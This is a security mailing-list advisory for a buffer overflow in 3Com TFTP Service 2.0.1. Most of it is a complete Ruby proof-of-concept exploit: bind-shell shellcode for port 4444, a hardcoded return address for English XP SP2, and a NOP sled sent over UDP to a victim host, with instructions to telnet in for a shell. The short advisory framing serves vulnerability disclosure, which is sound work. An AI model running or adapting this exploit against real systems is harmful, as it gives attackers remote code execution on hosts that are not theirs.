[EXPL] 3Com TFTP Service Long Transporting Mode Buffer Overflow (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



3Com TFTP Service Long Transporting Mode Buffer Overflow (Exploit)
------------------------------------------------------------------------


SUMMARY

3Com TFTP Service is vulnerable to a buffer overflow vulnerability.

DETAILS

Vulnerable Systems:
* 3Com TFTP Service version 2.0.1

Exploit:
# 3comtftpd_xpsp2.rb
#
# Copyright (C) cthulhu
#
#
# This is a poc intended to exploit the 3Com TFTP Service version 2.0.1
# long transporting mode buffer overflow under xp sp2 english
# (Vulnerability discovered by Liu Qixu)
#
# Usage :
# ruby 3comftpd_xpsp2.rb <victimhost> <victimport>
# Default port is 69 if not specified

require 'socket'

# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub
http://metasploit.com

sc1 = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x02"
sc1 += "\xaf\xbb\x16\x83\xeb\xfc\xe2\xf4\xfe\xc5\x50\x5b\xea\x56\x44\xe9"
sc1 +="\xfd\xcf\x30\x7a\x26\x8b\x30\x53\x3e\x24\xc7\x13\x7a\xae\x54\x9d"
sc1 +="\x4d\xb7\x30\x49\x22\xae\x50\x5f\x89\x9b\x30\x17\xec\x9e\x7b\x8f"
sc1 +="\xae\x2b\x7b\x62\x05\x6e\x71\x1b\x03\x6d\x50\xe2\x39\xfb\x9f\x3e"
sc1 +="\x77\x4a\x30\x49\x26\xae\x50\x70\x89\xa3\xf0\x9d\x5d\xb3\xba\xfd"
sc1 +="\x01\x83\x30\x9f\x6e\x8b\xa7\x77\xc1\x9e\x60\x72\x89\xec\x8b\x9d"
sc1 +="\x42\xa3\x30\x66\x1e\x02\x30\x56\x0a\xf1\xd3\x98\x4c\xa1\x57\x46"
sc1 +="\xfd\x79\xdd\x45\x64\xc7\x88\x24\x6a\xd8\xc8\x24\x5d\xfb\x44\xc6"
sc1 +="\x6a\x64\x56\xea\x39\xff\x44\xc0\x5d\x26\x5e\x70\x83\x42\xb3\x14"
sc1 +="\x57\xc5\xb9\xe9\xd2\xc7\x62\x1f\xf7\x02\xec\xe9\xd4\xfc\xe8\x45"
sc1 +="\x51\xfc\xf8\x45\x41\xfc\x44\xc6\x64\xc7\xaa\x4a\x64\xfc\x32\xf7"
sc1 +="\x97\xc7\x1f\x0c\x72\x68\xec\xe9\xd4\xc5\xab\x47\x57\x50\x6b\x7e"
sc1 +="\xa6\x02\x95\xff\x55\x50\x6d\x45\x57\x50\x6b\x7e\xe7\xe6\x3d\x5f"
sc1 +="\x55\x50\x6d\x46\x56\xfb\xee\xe9\xd2\x3c\xd3\xf1\x7b\x69\xc2\x41"
sc1 +="\xfd\x79\xee\xe9\xd2\xc9\xd1\x72\x64\xc7\xd8\x7b\x8b\x4a\xd1\x46"
sc1 +="\x5b\x86\x77\x9f\xe5\xc5\xff\x9f\xe0\x9e\x7b\xe5\xa8\x51\xf9\x3b"
sc1 +="\xfc\xed\x97\x85\x8f\xd5\x83\xbd\xa9\x04\xd3\x64\xfc\x1c\xad\xe9"
sc1 +="\x77\xeb\x44\xc0\x59\xf8\xe9\x47\x53\xfe\xd1\x17\x53\xfe\xee\x47"
sc1 +="\xfd\x7f\xd3\xbb\xdb\xaa\x75\x45\xfd\x79\xd1\xe9\xfd\x98\x44\xc6"
sc1 +="\x89\xf8\x47\x95\xc6\xcb\x44\xc0\x50\x50\x6b\x7e\xf2\x25\xbf\x49"
sc1 +="\x51\x50\x6d\xe9\xd2\xaf\xbb\x16"

jmp = "\x63\x20\xdc\x77" # jmp esi user32.dll xp sp 2 english

host = ARGV[0]
port = 69

if ARGV[1]
port = ARGV[1]
end

sock = UDPSocket.new()

puts "[+]Trying to connect to #{host}"
if (not sock.connect(host,port))
raise "Unable to connect to #{host}"
end

exploit = "\x00\x02"
exploit += "a"
exploit += "\x00"
exploit += "\x90"* 129
exploit += sc1
exploit += jmp
exploit += "\x00"

puts "[+] Connected ... Sending exploit to victim"
sock.send exploit,0

puts "[+] Exploit sent.. Now telnet on port 4444 for your shell"


ADDITIONAL INFORMATION

The information has been provided by <mailto:dante@xxxxxxxxxxxxx> Davide
Del Vecchio.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages